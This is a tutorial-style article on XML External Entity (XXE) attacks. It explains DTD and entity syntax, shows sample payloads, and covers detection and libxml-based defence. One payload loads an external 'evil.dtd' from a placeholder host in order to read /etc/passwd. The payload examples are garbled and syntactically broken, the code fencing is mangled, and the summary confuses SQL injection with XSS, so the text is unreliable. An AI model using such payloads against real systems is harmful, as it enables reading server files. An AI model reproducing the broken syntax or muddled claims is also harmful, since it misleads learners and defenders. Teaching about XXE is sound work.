XML External Entity (XXE) Attacks: A Comprehensive Guide

Cyber Security
1

XML External Entity (XXE) Attacks: A Comprehensive Guide

Introduction

In recent years, XXE attacks have risen to the third spot in the OWASP top 10 list, sparking a strong interest in the security community. Despite its growing popularity, XXE remains poorly understood, and its attacks are often underestimated. In this article, we will delve into the world of XXE, exploring its syntax, attacks, vulnerability detection, and defense strategies.

What is XXE?

XXE stands for XML External Entity, which refers to external entity attacks. To grasp the concept of XXE attacks, it is essential to understand the XML-related syntax.

XML Syntax

XML (Extensible Markup Language) is a markup language designed to transmit and store data. The basic XML format consists of three parts:

  1. xml version: This part specifies the XML version.
  2. DTD (Document Type Definition): This part defines the document type definition.
  3. xml statement: This part contains the main XML content.

The basic XML format is as follows:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root element [element declaration]>
<xml statement>

DTD Syntax

DTD is a document type definition that describes the structure of an XML document. There are two ways to build DTD: internal DTD declaration and external DTD references.

Internal DTD Declaration

Internal DTD declaration is used to define the DTD within the XML document. The syntax is as follows:

<!DOCTYPE root element [element declaration]>

External DTD References

External DTD references are used to reference an external DTD file. The syntax is as follows:

<!DOCTYPE root element SYSTEM "filename">

Entity Declaration

Entity declaration is used to define an entity within the DTD. There are two ways to build entity declarations: internal entity declaration and external entity declarations.

Internal Entity Declaration

Internal entity declaration is used to define an entity within the DTD. The syntax is as follows:

<!ENTITY entity-name "entity-value">

External Entity Declarations

External entity declarations are used to reference an external entity. The syntax is as follows:

<!ENTITY entity-name SYSTEM "URI / URL">

XXE Attacks

XXE attacks involve injecting malicious code into the DTD to access local content remotely. The general XXE use is divided into two scenarios: echo and no echo.

Echo Scenario

In the echo scenario, the XXE attack can be seen in the payload execution results or phenomena directly on the page. There are two ways to inject XXE attacks in the echo scenario:

  1. Direct External Entity Reference: This method involves directly referencing an external entity URI sensitive to the directory.

<!DOCTYPE foo [! ]> & xxe; 

2.  **External Entity Reference with Malicious Local DTD**: This method involves setting the external entity reference URL to the local server and injecting a malicious local DTD file.

    ```xml
<!DOCTYPE foo [! <ELEMENT foo ANY> <ENTITY% xxe SYSTEM "http://xxx.xxx.xxx/evil.dtd">% xxe;!]> <Foo> & evil; </ foo>

The external `evil.dtd` content is as follows:

```xml

<! ENTITY evil SYSTEM “file: /// etc / passwd”>


**No Echo Scenario**

In the no echo scenario, the XXE attack does not directly display the payload execution results. Instead, it uses a packed data channel to extract data.

**XXE Vulnerability Detection**

The most direct way to detect XXE vulnerabilities is to analyze the receiving node as an input XML content. However, many times, these seemingly nodes may not be obvious, and you may need to use tools like Burp to modify different fields, such as HTTP request method and Content-Type header fields, to see if the application resolves the content sent.

**XXE Repair and Defense**

To repair and defend against XXE attacks, you can upgrade `libxml` to version 2.9.0 or later, which disables the default resolving of external entities. Alternatively, you can manually examine the underlying XML parsing library and disable the resolving of external entities.

**Summary**

XXE attacks have a wide range of use patterns and can cause great harm. In addition to reading documents mentioned above, you can also use XXE attacks to perform denial of service attacks, command execution, SQL (XSS) injection, network port scanning, and intrusion within web sites. The article also includes a summary of the XXE verification environment, which contains many other loopholes, such as HeartBleed bleeding heart, JBoss deserialization, Nginx parsing vulnerabilities, and more.

**Conclusion**

In conclusion, XXE attacks are a powerful and underestimated threat. By understanding the XML-related syntax, entity declaration, and XXE attacks, you can better defend against these attacks and protect your web applications. Remember to upgrade `libxml` to version 2.9.0 or later and manually examine the underlying XML parsing library to disable the resolving of external entities.